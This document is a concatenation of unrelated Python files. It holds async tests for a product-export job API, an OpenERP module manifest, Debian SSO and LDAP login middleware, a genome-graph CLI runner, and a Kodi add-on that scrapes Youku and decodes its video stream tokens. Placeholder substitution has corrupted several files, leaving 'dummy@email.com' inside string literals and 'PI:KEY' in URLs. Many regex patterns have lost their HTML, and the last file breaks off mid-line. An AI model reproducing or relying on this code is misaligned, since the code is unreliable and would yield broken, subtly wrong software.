coro\n return corofunc\n\n\ndef set_data_importer_patch(monkeypatch, mock_=None):\n if mock_ is None:\n mock_ = mock.MagicMock()\n\n monkeypatch.setattr(\'tests.integration.fixtures.TopSellerArrayTest.get_data\', mock_)\n return mock_\n\n\nclass TestEngineObjectsModelsObjectsExporterWithImport(object):\n\n async def test_exporter_post_with_import(self, init_db, headers, headers_without_content_type, client, monkeypatch):\n set_patches(monkeypatch)\n client = await client\n await _post_products(client, headers, headers_without_content_type)\n\n set_readers_builders_patch(monkeypatch)\n get_data_patch = set_data_importer_patch(monkeypatch)\n get_data_patch.return_value = {}\n\n resp = await client.post(\'/engine_objects/1/export?import_data=true\',\n headers=headers_without_content_type)\n hash_ = await resp.json()\n\n await _wait_job_finish(client, headers_without_content_type)\n\n called = bool(TopSellerArrayTest.get_data.called)\n TopSellerArrayTest.get_data.reset_mock()\n\n assert hash_ == {\'job_hash\': \'6342e10bd7dca3240c698aa79c98362e\'}\n assert called\n\n async def test_exporter_get_running_with_import(self, init_db, headers, headers_without_content_type, client, monkeypatch):\n set_patches(monkeypatch)\n client = await client\n def func(x, y, z):\n sleep(1)\n return {}\n\n await _post_products(client, headers, headers_without_content_type)\n\n set_readers_builders_patch(monkeypatch)\n set_data_importer_patch(monkeypatch, func)\n await client.post(\'/engine_objects/1/export?import_data=true\',\n headers=headers_without_content_type)\n\n resp = await client.get(\n \'/engine_objects/1/export?PI:KEY\',\n headers=headers_without_content_type)\n\n assert await resp.json() == {\'status\': \'running\'}\n await _wait_job_finish(client, headers_without_content_type)\n\n async def test_exporter_get_done_with_import(self, init_db, headers, headers_without_content_type, client, monkeypatch):\n set_patches(monkeypatch)\n client = await client\n await _post_products(client, headers, headers_without_content_type)\n\n set_readers_builders_patch(monkeypatch)\n await client.post(\'/engine_objects/1/export?import_data=true\',\n headers=headers_without_content_type)\n\n await _wait_job_finish(client, headers_without_content_type)\n\n resp = await client.get(\n \'/engine_objects/1/export?PI:KEY\',\n headers=headers_without_content_type)\n\n assert await resp.json() == {\n \'status\': \'done\',\n \'result\': {\n \'importer\': {\'lines_count\': 3},\n \'exporter\': {\n \'length\': 1,\n \'max_sells\': 1,\n \'min_sells\': 1\n }\n },\n \'time_info\': {\n \'elapsed\': \'0:00\',\n \'start\': \'1900-01-01 00:00\',\n \'end\': \'1900-01-01 00:00\'\n }\n }\n\n async def test_exporter_get_with_error_in_import_with_import(\n self, init_db, headers, headers_without_content_type, client, monkeypatch):\n set_patches(monkeypatch)\n client = await client\n await _post_products(client, headers, headers_without_content_type)\n\n get_data_patch = set_data_importer_patch(monkeypatch)\n get_data_patch.side_effect = Exception(\'testing\')\n await client.post(\'/engine_objects/1/export?import_data=true\', headers=headers_without_content_type)\n\n await _wait_job_finish(client, headers_without_content_type)\n\n resp = await client.get(\n \'/engine_objects/1/export?PI:KEY\', headers=headers_without_content_type)\n\n assert await resp.json() == {\n \'status\': \'error\',\n \'result\': {\'message\': \'testing\', \'name\': \'Exception\'},\n \'time_info\': {\n \'elapsed\': \'0:00\',\n \'start\': \'1900-01-01 00:00\',\n \'end\': \'1900-01-01 00:00\'\n }\n }\n\n async def test_exporter_get_with_error_in_export_with_import(\n self, init_db, headers, headers_without_content_type, client, monkeypatch):\n set_patches(monkeypatch)\n client = await client\n await _post_products(client, headers, headers_without_content_type)\n\n set_readers_builders_patch(monkeypatch, [])\n await client.post(\'/engine_objects/1/export?import_data=true\', headers=headers_without_content_type)\n\n await _wait_job_finish(client, headers_without_content_type)\n\n resp = await client.get(\n \'/engine_objects/1/export?PI:KEY\', headers=headers_without_content_type)\n\n assert await resp.json() == {\n \'status\': \'error\',\n \'result\': {\n \'message\': ""No data found for engine object \'Top Seller Object\'"",\n \'name\': \'EngineError\'\n },\n \'time_info\': {\n \'elapsed\': \'0:00\',\n \'start\': \'1900-01-01 00:00\',\n \'end\': \'1900-01-01 00:00\'\n }\n }\n', '# -*- encoding: utf-8 -*-\n#\n# Module Writen to OpenERP, Open Source Management Solution\n#\n# Copyright (c) 2014 Vauxoo - http://www.vauxoo.com/\n# All Rights Reserved.\n# info Vauxoo (dummy@email.com)\n#\n# Coded by: Vauxoo (dummy@email.com)\n#\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n#\n\n{\n \'name\': \'Runbot sync remote info\',\n \'category\': \'Website\',\n \'summary\': \'Runbot\',\n \'version\': \'1.0\',\n \'description\': """"""This module create a connection with\n remote host of git to sync information.\n e.g. Status of pull request\n e.g. name source branch of a pull request"""""",\n \'author\': \'Vauxoo\',\n \'depends\': [\'runbot\'],\n \'external_dependencies\': {\n },\n \'data\': [\n \'data/ir_cron_data.xml\',\n \'view/runbot_view.xml\',\n ],\n \'installable\': True,\n}\n', '# Copyright 2013 The Distro Tracker Developers\n# See the COPYRIGHT file at the top-level directory of this distribution and\n# at http://deb.li/DTAuthors\n#\n# This file is part of Distro Tracker. It is subject to the license terms\n# in the LICENSE file found in the top-level directory of this\n# distribution and at http://deb.li/DTLicense. No part of Distro Tracker,\n# including this file, may be copied, modified, propagated, or distributed\n# except according to the terms contained in the LICENSE file.\n\nfrom __future__ import unicode_literals\nfrom django.contrib.auth.middleware import RemoteUserMiddleware\nfrom django.contrib.auth.backends import RemoteUserBackend\nfrom django.contrib import auth\nfrom pts.accounts.models import UserEmail\nfrom pts.core.utils import get_or_none\nfrom pts.accounts.models import User\n\nimport ldap\n\n\nclass DebianSsoUserMiddleware(RemoteUserMiddleware):\n """"""\n Middleware that initiates user authentication based on the REMOTE_USER\n field provided by Debian\'s SSO system.\n\n If the currently logged in user is a DD (as identified by having a @debian.org\n address), he is forcefully logged out if the header is no longer found or is\n invalid.\n """"""\n header = \'REMOTE_USER\'\n\n def extract_email(self, username):\n parts = [part for part in username.split(\':\') if part]\n federation, jurisdiction = parts[:2]\n if (federation, jurisdiction) != (\'DEBIANORG\', \'DEBIAN\'):\n return\n\n return parts[-1] + dummy@email.com\'\n\n def is_debian_user(self, user):\n return any(\n email.email.endswith(dummy@email.com\')\n for email in user.emails.all()\n )\n\n def log_out_user(self, request):\n if request.user.is_authenticated():\n if self.is_debian_user(request.user):\n auth.logout(request)\n\n def process_request(self, request):\n if self.header not in request.META:\n # If a user is logged in to the PTS by Debian SSO, sign him out\n self.log_out_user(request)\n return\n\n username = request.META[self.header]\n if not username:\n self.log_out_user(request)\n return\n email = self.extract_email(username)\n\n if request.user.is_authenticated():\n if request.user.emails.filter(email=email).exists():\n # The currently logged in user matches the one given by the\n # headers.\n return\n\n user = auth.authenticate(remote_user=email)\n if user:\n request.user = user\n auth.login(request, user)\n\n\nclass DebianSsoUserBackend(RemoteUserBackend):\n """"""\n The authentication backend which authenticates the provided remote user\n (identified by his @debian.org email) in the PTS. If a matching User\n model instance does not exist, one is automatically created. In that case\n the DDs first and last name are pulled from Debian\'s LDAP.\n """"""\n def authenticate(self, remote_user):\n if not remote_user:\n return\n\n email = remote_user\n\n email_user = get_or_none(UserEmail, email=email)\n if not email_user:\n names = self.get_user_details(remote_user)\n kwargs = {}\n if names:\n kwargs.update(names)\n user = User.objects.create_user(main_email=email, **kwargs)\n else:\n user = email_user.user\n\n return user\n\n def get_uid(self, remote_user):\n # Strips off the @debian.org part of the email leaving the uid\n return remote_user[:-11]\n\n def get_user_details(self, remote_user):\n """"""\n Gets the details of the given user from the Debian LDAP.\n :return: Dict with the keys ``first_name``, ``last_name``\n ``None`` if the LDAP lookup did not return anything.\n """"""\n l = ldap.initialize(\'ldap://db.debian.org\')\n result_set = l.search_s(\n \'dc=debian,dc=org\',\n ldap.SCOPE_SUBTREE,\n \'uid={}\'.format(self.get_uid(remote_user)),\n None)\n if not result_set:\n return None\n\n result = result_set[0]\n return {\n \'first_name\': result[1][\'cn\'][0].decode(\'utf-8\'),\n \'last_name\': result[1][\'sn\'][0].decode(\'utf-8\'),\n }\n\n def get_user(self, user_id):\n try:\n return User.objects.get(pk=user_id)\n except User.DoesNotExist:\n return None\n', '#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# (c) Camille Scott, 2019\n# File : cdbg_stream.py\n# License: MIT\n# Author : Camille Scott dummy@email.com\n# Date : 11.03.2020\n\nfrom goetia import libgoetia\n\nfrom goetia.cdbg import (compute_connected_component_callback,\n compute_unitig_fragmentation_callback,\n write_cdbg_metrics_callback,\n write_cdbg_callback)\nfrom goetia.dbg import get_graph_args, process_graph_args\nfrom goetia.parsing import get_fastx_args, iter_fastx_inputs\nfrom goetia.processors import AsyncSequenceProcessor, at_modulo_interval\nfrom goetia.messages import (Interval, SampleStarted, SampleFinished, Error, AllMessages)\nfrom goetia.metadata import CUR_TIME\nfrom goetia.serialization import cDBGSerialization\n\nfrom goetia.cli.args import get_output_interval_args, print_interval_settings\nfrom goetia.cli.runner import CommandRunner\n\nimport curio\n\nimport os\nimport sys\n\n\nclass cDBGRunner(CommandRunner):\n\n def __init__(self, parser):\n get_graph_args(parser)\n get_cdbg_args(parser)\n get_output_interval_args(parser)\n\n group = get_fastx_args(parser)\n group.add_argument(\'-o\', dest=\'output_filename\', default=\'/dev/stdout\')\n group.add_argument(\'-i\', \'--inputs\', dest=\'inputs\', nargs=\'+\', required=True)\n\n parser.add_argument(\'--echo\', default=None,\n help=\'echo all events to the given file.\')\n parser.add_argument(\'--curio-monitor\', default=False, action=\'store_true\',\n help=\'Run curio kernel monitor for async debugging.\')\n parser.add_argument(\'--verbose\', default=False, action=\'store_true\')\n\n super().__init__(parser)\n\n def postprocess_args(self, args):\n process_graph_args(args)\n process_cdbg_args(args)\n\n def setup(self, args):\n os.makedirs(args.results_dir, exist_ok=True)\n\n self.dbg_t = args.graph_t\n self.hasher = args.hasher_t(args.ksize)\n self.storage = args.storage.build(*args.storage_args)\n self.dbg = args.graph_t.build(self.storage, self.hasher)\n\n self.cdbg_t = libgoetia.cdbg.cDBG[type(self.dbg)]\n\n self.compactor_t = libgoetia.cdbg.StreamingCompactor[type(self.dbg)]\n\n self.compactor = self.compactor_t.Compactor.build(self.dbg)\n\n if args.normalize:\n self.file_processor = self.compactor_t.NormalizingCompactor[FastxReader].build(self.compactor,\n args.normalize,\n args.interval)\n else:\n self.file_processor = self.compactor_t.Processor.build(self.compactor,\n args.interval)\n \n # Iterator over samples (pairs or singles, depending on pairing-mode)\n sample_iter = iter_fastx_inputs(args.inputs, args.pairing_mode, names=args.names)\n # AsyncSequenceProcessor does event management and callback for the FileProcessors\n self.processor = AsyncSequenceProcessor(self.file_processor, sample_iter, args.echo)\n # Subscribe a listener to the FileProcessor producer\n self.worker_listener = self.processor.add_listener(\'worker_q\', \'cdbg.consumer\')\n\n #\n # Register callbacks for data outputs.\n # Track a list of files that need to be closed with a ]\n # when we\'re done.\n # \n self.to_close = []\n\n if args.track_cdbg_metrics:\n self.worker_listener.on_message(Interval,\n write_cdbg_metrics_callback,\n self.compactor,\n args.track_cdbg_metrics,\n args.verbose)\n self.to_close.append(args.track_cdbg_metrics)\n\n\n if args.track_unitig_bp:\n if args.unitig_bp_bins is None:\n bins = [args.ksize, 100, 200, 500, 1000]\n else:\n bins = args.unitig_bp_bins\n \n self.worker_listener.on_message(Interval,\n at_modulo_interval(compute_unitig_fragmentation_callback,\n modulus=args.unitig_bp_tick),\n self.cdbg_t,\n self.compactor.cdbg,\n args.track_unitig_bp,\n bins,\n verbose=args.verbose)\n self.to_close.append(args.track_unitig_bp)\n\n\n if args.track_cdbg_components:\n self.worker_listener.on_message(Interval,\n at_modulo_interval(compute_connected_component_callback,\n modulus=args.cdbg_components_tick),\n self.cdbg_t,\n self.compactor.cdbg,\n args.track_cdbg_components,\n args.component_sample_size,\n verbose=args.verbose)\n self.to_close.append(args.track_cdbg_components)\n\n if args.save_cdbg:\n for cdbg_format in args.save_cdbg_format:\n self.worker_listener.on_message(Interval,\n at_modulo_interval(write_cdbg_callback,\n modulus=args.cdbg_tick),\n args.save_cdbg,\n cdbg_format,\n verbose=args.verbose)\n self.worker_listener.on_message(SampleFinished,\n write_cdbg_callback,\n args.save_cdbg,\n cdbg_format,\n verbose=args.verbose)\n\n # Close all files when done\n async def close_files(msg, files):\n for file_name in files:\n async with curio.aopen(file_name, \'a\') as fp:\n await fp.write(\'\\n]\\n\')\n\n self.worker_listener.on_message(SampleFinished, close_files, self.to_close)\n\n #\n # Regular diagnostics output\n # \n\n def info_output(msg):\n info = f\'{msg.msg_type}: {getattr(msg, ""state"", """")}\'\\\n f\'\\n\\tSample: {msg.sample_name}\'\\\n f\'\\n\\tSequences: {msg.sequence}\'\\\n f\'\\n\\tk-mers: {msg.t}\'\n if msg.msg_type == \'Error\':\n info += f\'\\n\\tError: {msg.error}\'\n\n print(info, file=sys.stderr)\n\n self.worker_listener.on_message(AllMessages, info_output)\n \n def execute(self, args):\n curio.run(self.processor.start, with_monitor=args.curio_monitor)\n\n def teardown(self):\n pass\n\n\ndef get_cdbg_args(parser):\n default_prefix = \'goetia.build-cdbg.\' + CUR_TIME\n parser.default_prefix = default_prefix\n group = parser.add_argument_group(\'cDBG\')\n\n group.add_argument(\'--results-dir\',\n default=default_prefix)\n\n group.add_argument(\'--normalize\',\n type=int,\n nargs=\'?\',\n const=10)\n\n group.add_argument(\'--save-cdbg\',\n metavar=\'PREFIX.\',\n nargs=\'?\',\n const=\'goetia.cdbg.graph\',\n help=\'Save a copy of the cDBG.\')\n group.add_argument(\'--save-cdbg-format\',\n nargs=\'+\',\n choices=cDBGSerialization.FORMATS,\n default=[\'gfa1\'])\n group.add_argument(\'--cdbg-tick\',\n type=int,\n default=10,\n help=\'Save every N interval ticks.\')\n\n group.add_argument(\'--track-cdbg-metrics\',\n metavar=\'FILE_NAME.json\',\n nargs=\'?\',\n const=\'goetia.cdbg.stats.json\',\n help=\'Output basic cDBG metrics.\')\n group.add_argument(\'--cdbg-metrics-tick\',\n type=int,\n default=5,\n help=\'Output every N interval ticks.\')\n\n group.add_argument(\'--track-cdbg-components\',\n metavar=\'FILE_NAME.json\',\n nargs=\'?\',\n const=\'goetia.cdbg.components.json\',\n help=\'Save the distribution of component sizes.\')\n group.add_argument(\'--component-sample-size\',\n type=int,\n default=10000,\n help=\'Number of components to sample for size.\')\n group.add_argument(\'--cdbg-components-tick\',\n type=int,\n default=5,\n help=\'Sample and save distribution every N interval ticks.\')\n\n group.add_argument(\'--track-unitig-bp\',\n metavar=\'FILENAME.json\',\n nargs=\'?\',\n const=\'goetia.cdbg.unitigs.bp.json\',\n help=\'Track the distribution of unitig sizes.\')\n group.add_argument(\'--unitig-bp-bins\',\n nargs=\'+\',\n type=int,\n help=\'Bin sizes of distribution.\')\n group.add_argument(\'--unitig-bp-tick\',\n type=int,\n default=10)\n\n group.add_argument(\'--validate\',\n metavar=\'FILENAME.csv\',\n nargs=\'?\',\n const=\'goetia.cdbg.validation.csv\')\n\n return group\n\n\ndef process_cdbg_args(args):\n\n def join(p):\n return p if p is None else os.path.join(args.results_dir, p)\n\n args.track_cdbg_stats = join(args.track_cdbg_metrics)\n args.track_cdbg_components = join(args.track_cdbg_components)\n args.save_cdbg = join(args.save_cdbg)\n args.track_cdbg_unitig_bp = join(args.track_unitig_bp)\n\n\ndef print_cdbg_args(args):\n print(\'* cDBG Params\', file=sys.stderr)\n print(\'* Directory: \', args.results_dir, file=sys.stderr)\n if args.save_cdbg:\n print(\'* Saving cDBG every {0} sequences with file prefix {1}\'.format(args.coarse_interval,\n args.save_cdbg),\n file=sys.stderr)\n print(\'* cDBG save formats: {0}\'.format(\', \'.join(args.save_cdbg_format)))\n if args.track_cdbg_stats:\n print(\'* Tracking cDBG stats and reporting every {0} sequences\'.format(args.fine_interval),\n file=sys.stderr)\n print(\'* Saving tracking information to\', args.track_cdbg_stats, file=sys.stderr)\n if args.track_cdbg_history:\n print(\'* Tracking cDBG history and saving to\', args.track_cdbg_history, file=sys.stderr)\n if args.validate:\n print(\'* cDBG will be validated on completion and results saved to\', args.validate,\n file=sys.stderr)\n print(\'*\', \'*\' * 10, \'*\', sep=\'\\n\', file=sys.stderr)\n\n\n', '\ufeff# -*- coding: utf-8 -*-\nimport xbmc, xbmcgui, xbmcplugin, xbmcaddon, urllib2, urllib, re, string, sys, os, gzip, StringIO, math, urlparse\nimport base64, time, cookielib\nimport simplejson\n\n# Plugin constants \n__addon__ = xbmcaddon.Addon()\n__addonname__ = __addon__.getAddonInfo(\'name\')\n__profile__ = xbmc.translatePath( __addon__.getAddonInfo(\'profile\') ).decode(""utf-8"")\n\nUserAgent = \'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)\'\nORDER_LIST1 = [[\'1\',\'最多播放\'], [\'2\',\'最多评论\'], [\'4\',\'最受欢迎\'], [\'5\',\'最近上映\'], [\'6\',\'最近更新\']]\nDAYS_LIST1 = [[\'1\',\'今日\'], [\'2\',\'本周\'], [\'4\',\'历史\']]\nORDER_LIST2 = [[\'1\',\'最多播放\'], [\'2\',\'最新发布\'], [\'3\',\'最多评论\'], [\'4\',\'最多收藏\'], [\'5\',\'最受欢迎\']]\nDAYS_LIST2 = [[\'1\',\'今日\'], [\'2\',\'本周\'], [\'3\',\'本月\'], [\'4\',\'历史\']]\n\nclass youkuDecoder:\n def __init__( self ):\n return\n\n def getFileIDMixString(self,seed): \n mixed = [] \n source = list(""abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/\\:._-1234567890"") \n seed = float(seed) \n for i in range(len(source)): \n seed = (seed * 211 + 30031 ) % 65536 \n index = math.floor(seed /65536 *len(source)) \n mixed.append(source[int(index)]) \n source.remove(source[int(index)]) \n return mixed \n\n def getFileId(self,fileId,seed): \n mixed = self.getFileIDMixString(seed) \n ids = fileId.split(\'*\') \n realId = [] \n for i in range(0,len(ids)-1):\n realId.append(mixed[int(ids[i])]) \n return \'\'.join(realId)\n\n def trans_e(self, a, c):\n b = range(256)\n f = 0\n result = \'\'\n h = 0\n while h < 256:\n f = (f + b[h] + ord(a[h % len(a)])) % 256\n b[h], b[f] = b[f], b[h]\n h += 1\n q = f = h = 0\n while q < len(c):\n h = (h + 1) % 256\n f = (f + b[h]) % 256\n b[h], b[f] = b[f], b[h]\n result += chr(ord(c[q]) ^ b[(b[h] + b[f]) % 256])\n q += 1\n return result\n\n def trans_f(self, a, c):\n """"""\n :argument a: list\n :param c:\n :return:\n """"""\n b = []\n for f in range(len(a)):\n i = ord(a[f][0]) - 97 if ""a"" <= a[f] <= ""z"" else int(a[f]) + 26\n e = 0\n while e < 36:\n if c[e] == i:\n i = e\n break\n e += 1\n v = i - 26 if i > 25 else chr(i + 97)\n b.append(str(v))\n return \'\'.join(b)\n\n f_code_1 = \'becaf9be\'\n f_code_2 = \'bf7e5f01\'\n\n def _calc_ep(self, sid, fileId, token):\n ep = self.trans_e(self.f_code_2, \'%s_%s_%s\' % (sid, fileId, token))\n return base64.b64encode(ep)\n\n def _calc_ep2(self, vid, ep):\n e_code = self.trans_e(self.f_code_1, base64.b64decode(ep))\n sid, token = e_code.split(\'_\')\n new_ep = self.trans_e(self.f_code_2, \'%s_%s_%s\' % (sid, vid, token))\n return base64.b64encode(new_ep), token, sid\n\n def get_sid(self, ep):\n e_code = self.trans_e(self.f_code_1, base64.b64decode(ep))\n return e_code.split(\'_\')\n\n def generate_ep(self, no, fileid, sid, token):\n ep = urllib.quote(self._calc_ep(sid, fileid, token).encode(\'latin1\'),\n safe=""~()*!.\'""\n )\n return ep\n\ndef log(txt):\n message = \'%s: %s\' % (__addonname__, txt)\n xbmc.log(msg=message, level=xbmc.LOGDEBUG)\n\ndef GetHttpData(url, referer=\'\'):\n log(""%s::url - %s"" % (sys._getframe().f_code.co_name, url))\n req = urllib2.Request(url)\n req.add_header(\'User-Agent\', UserAgent)\n if referer:\n req.add_header(\'Referer\', referer)\n try:\n response = urllib2.urlopen(req)\n httpdata = response.read()\n if response.headers.get(\'content-encoding\', None) == \'gzip\':\n httpdata = gzip.GzipFile(fileobj=StringIO.StringIO(httpdata)).read()\n charset = response.headers.getparam(\'charset\')\n response.close()\n except:\n log( ""%s (%d) [%s]"" % (\n sys.exc_info()[2].tb_frame.f_code.co_name,\n sys.exc_info()[2].tb_lineno,\n sys.exc_info()[1]\n ))\n return \'\'\n match = re.compile(\'(.+?)\').search(text)\n if match:\n list.append([id, match.group(1)])\n\ndef getList(listpage,id,genre,area,year):\n if id == \'c_95\':\n str1 = \'风格:\'\n str3a = \'发行:\'\n str3b = \'r\'\n elif id == \'c_84\' or id == \'c_87\':\n str1 = \'类型:\'\n str3a = \'出品:\'\n str3b = \'pr\'\n else:\n str1 = \'类型:\'\n str3a = \'时间:\'\n str3b = \'r\'\n match = re.compile(\'(.+?)\' % (str1), re.DOTALL).search(listpage)\n genrelist = re.compile(\'_g_([^_\\.]*)[^>]*>([^<]+)\').findall(match.group(1))\n getCurrent(match.group(1), genrelist, genre)\n if id == \'c_84\' or id == \'c_87\':\n arealist = []\n else:\n match = re.compile(\'(.+?)\', re.DOTALL).search(listpage)\n arealist = re.compile(\'_a_([^_\\.]*)[^>]*>([^<]+)\').findall(match.group(1))\n getCurrent(match.group(1), arealist, area)\n match = re.compile(\'(.+?)\' % (str3a), re.DOTALL).search(listpage)\n yearlist = re.compile(\'_%s_([^_\\.]*)[^>]*>([^<]+)\' % (str3b)).findall(match.group(1))\n getCurrent(match.group(1), yearlist, year)\n return genrelist,arealist,yearlist\n\ndef getList2(listpage,genre):\n match = re.compile(\'(.+?)\', re.DOTALL).search(listpage)\n if match:\n genrelist = re.compile(\'
  • ]*>(.+?)
  • \').findall(match.group(1))\n getCurrent(match.group(1), genrelist, genre)\n else:\n genrelist = []\n return genrelist\n\ndef rootList():\n link = GetHttpData(\'http://list.youku.com/\')\n match0 = re.compile(\'(.+?)\', re.DOTALL).search(link)\n match = re.compile(\'
  • (.+?)
  • \', re.DOTALL).findall(match0.group(1))\n totalItems = len(match)\n for path, id, name in match:\n if path == \'show\':\n u = sys.argv[0]+""?mode=1&name=""+urllib.quote_plus(name)+""&id=""+urllib.quote_plus(id)+""&genre=&area=&year=&order=1&days=1&page=1""\n else:\n u = sys.argv[0]+""?mode=11&name=""+urllib.quote_plus(name)+""&id=""+urllib.quote_plus(id)+""&genre=0&year=1&order=1&days=1&page=1""\n li = xbmcgui.ListItem(name)\n xbmcplugin.addDirectoryItem(int(sys.argv[1]),u,li,True,totalItems)\n xbmcplugin.endOfDirectory(int(sys.argv[1]))\n\ndef progList(name,id,page,genre,area,year,order,days):\n url = \'http://list.youku.com/category/show/%s_g_%s_a_%s_s_%s_d_%s_r_%s_p_%s.html\' % (id, genre, area, order, days, year, page)\n link = GetHttpData(url)\n match = re.compile(\'
      (.+?)
    \', re.DOTALL).search(link)\n plist = []\n if match:\n match1 = re.compile(\'([0-9]+)(|)\', re.DOTALL).findall(match.group(1))\n if match1:\n for num, temp in match1:\n if (num not in plist) and (num != page):\n plist.append(num)\n totalpages = int(match1[len(match1)-1][0])\n else:\n totalpages = 1\n match = re.compile(\'
    (.+?)
    \', re.DOTALL).search(link)\n if match:\n listpage = match.group(1)\n else:\n listpage = \'\'\n if id == \'c_95\':\n match = re.compile(\'
    \', re.DOTALL).findall(link)\n else:\n match = re.compile(\'
    (.+?)
    \', re.DOTALL).findall(link)\n totalItems = len(match) + 1 + len(plist)\n currpage = int(page)\n\n genrelist,arealist,yearlist = getList(listpage,id,genre,area,year)\n if genre:\n genrestr = searchDict(genrelist,genre)\n else:\n genrestr = \'全部类型\'\n if area:\n areastr = searchDict(arealist,area)\n else:\n\t\t areastr = \'全部地区\'\n if year:\n yearstr = searchDict(yearlist,year)\n else:\n if id == \'c_84\' or id == \'c_87\':\n yearstr = \'全部出品\'\n else:\n yearstr = \'全部年份\'\n li = xbmcgui.ListItem(name+\'(第\'+str(currpage)+\'/\'+str(totalpages)+\'页)【[COLOR FFFF0000]\' + genrestr + \'[/COLOR]/[COLOR FF00FF00]\' + areastr + \'[/COLOR]/[COLOR FFFFFF00]\' + yearstr + \'[/COLOR]/[COLOR FF00FF00]\' + searchDict(DAYS_LIST1,days) + \'[/COLOR]/[COLOR FF00FFFF]\' + searchDict(ORDER_LIST1,order) + \'[/COLOR]】(按此选择)\')\n u = sys.argv[0]+""?mode=4&name=""+urllib.quote_plus(name)+""&id=""+urllib.quote_plus(id)+""&genre=""+urllib.quote_plus(genre)+""&area=""+urllib.quote_plus(area)+""&year=""+urllib.quote_plus(year)+""&order=""+order+""&days=""+days+""&page=""+urllib.quote_plus(listpage)\n xbmcplugin.addDirectoryItem(int(sys.argv[1]), u, li, True, totalItems)\n for i in range(0,len(match)):\n if id in (\'c_96\',\'c_95\'):\n mode = 2\n isdir = False\n else:\n mode = 3\n isdir = True\n match1 = re.compile(\'/id_(.+?).html""\').search(match[i]) \n p_id = match1.group(1)\n match1 = re.compile(\'(.+?)\').search(match[i])\n p_name = match1.group(1)\n match1 = re.compile(\'
  • (.+?)\').search(match[i])\n if match1:\n p_name1 = p_name + \'(\' + match1.group(1) + \')\'\n else:\n p_name1 = p_name\n match1 = re.compile(\'(.+?)\').search(match[i])\n if match1:\n p_name1 = p_name1 + \'[\' + match1.group(1) + \']\'\n li = xbmcgui.ListItem(str(i + 1) + \'. \' + p_name1, iconImage = \'\', thumbnailImage = p_thumb)\n u = sys.argv[0]+""?mode=""+str(mode)+""&name=""+urllib.quote_plus(p_name)+""&id=""+urllib.quote_plus(p_id)+""&thumb=""+urllib.quote_plus(p_thumb)\n #li.setInfo(type = ""Video"", infoLabels = {""Title"":p_name, ""Director"":p_director, ""Genre"":p_genre, ""Plot"":p_plot, ""Year"":p_year, ""Cast"":p_cast, ""Tagline"":p_tagline})\n xbmcplugin.addDirectoryItem(int(sys.argv[1]), u, li, isdir, totalItems)\n \n for num in plist:\n li = xbmcgui.ListItem(""... 第"" + num + ""页"")\n u = sys.argv[0]+""?mode=1&name=""+urllib.quote_plus(name)+""&id=""+urllib.quote_plus(id)+""&genre=""+urllib.quote_plus(genre)+""&area=""+urllib.quote_plus(area)+""&year=""+year+""&order=""+order+""&days=""+days+""&page=""+str(num)\n xbmcplugin.addDirectoryItem(int(sys.argv[1]), u, li, True, totalItems) \n xbmcplugin.setContent(int(sys.argv[1]), \'movies\')\n xbmcplugin.endOfDirectory(int(sys.argv[1]))\n\ndef getMovie(name,id,thumb):\n if len(id)==21:\n link = GetHttpData(\'http://www.youku.com/show_page/id_\' + id + \'.html\')\n match = re.compile(\'.*?href=""http://v.youku.com/v_show/id_(.+?)\\.html[^""]*""\', re.DOTALL).search(link)\n if match:\n # 播放正片\n PlayVideo(name, match.group(1), thumb)\n else:\n # 解析预告片\n match = re.compile(\'class=""btnShow btnplaytrailer"".*?href=""http://v.youku.com/v_show/id_(.+?)\\.html[^""]*""\', re.DOTALL).search(link)\n if match:\n PlayVideo(name, match.group(1), thumb)\n else:\n xbmcgui.Dialog().ok(__addonname__, \'解析地址异常,可能是收费节目,无法播放\')\n else:\n PlayVideo(name, id, thumb)\n\ndef seriesList(name,id,thumb):\n url = ""http://v.youku.com/v_show/id_%s.html"" % (id)\n data = GetHttpData(url)\n #pages = re.compile(\'
  • 1:\n # for i in range(1,len(pages)):\n # url = ""http://www.youku.com/show_point/id_%s.html?dt=json&divid=%s&tab=0&__rt=1&__ro=%s"" % (id, pages[i], pages[i])\n # link = GetHttpData(url)\n # data += link\n match = re.compile(\'class=""item(.+?)
  • \', re.DOTALL).findall(data)\n totalItems = len(match)\n\n for i in range(0,len(match)):\n match1 = re.compile(\'//v.youku.com/v_show/id_(.+?)\\.html\').search(match[i])\n if match1:\n p_id = match1.group(1)\n else:\n continue\n #match1 = re.compile(\'
    (.+?)\', re.DOTALL).search(link)\n plist = []\n if match:\n match1 = re.compile(\'([0-9]+)(|)\', re.DOTALL).findall(match.group(1))\n if match1:\n for num, temp in match1:\n if (num not in plist) and (num != page):\n plist.append(num)\n totalpages = int(match1[len(match1)-1][0])\n else:\n totalpages = 1\n match = re.compile(\'
    (.+?)
    \', re.DOTALL).search(link)\n if match:\n listpage = match.group(1)\n else:\n listpage = \'\'\n match = re.compile(\'
    \', re.DOTALL).findall(link)\n\n totalItems = len(match) + 1 + len(plist)\n currpage = int(page)\n\n genrelist = getList2(listpage, genre)\n if genre == \'0\':\n genrestr = \'全部类型\'\n else:\n genrestr = searchDict(genrelist,genre)\n li = xbmcgui.ListItem(name+\'(第\'+str(currpage)+\'/\'+str(totalpages)+\'页)【[COLOR FFFF0000]\' + genrestr + \'[/COLOR]/[COLOR FF00FF00]\' + searchDict(DAYS_LIST2,days) + \'[/COLOR]/[COLOR FF00FFFF]\' + searchDict(ORDER_LIST2,order) + \'[/COLOR]】(按此选择)\')\n u = sys.argv[0]+""?mode=12&name=""+urllib.quote_plus(name)+""&id=""+urllib.quote_plus(id)+""&genre=""+urllib.quote_plus(genre)+""&order=""+order+""&days=""+days+""&page=""+urllib.quote_plus(listpage)\n xbmcplugin.addDirectoryItem(int(sys.argv[1]), u, li, True, totalItems)\n for i in range(0,len(match)):\n match1 = re.compile(\'/id_(.+?).html""\').search(match[i])\n p_id = match1.group(1)\n match1 = re.compile(\'(.+?)\').search(match[i])\n p_name = match1.group(1)\n p_name1 = p_name\n li = xbmcgui.ListItem(str(i + 1) + \'. \' + p_name1, iconImage = \'\', thumbnailImage = p_thumb)\n u 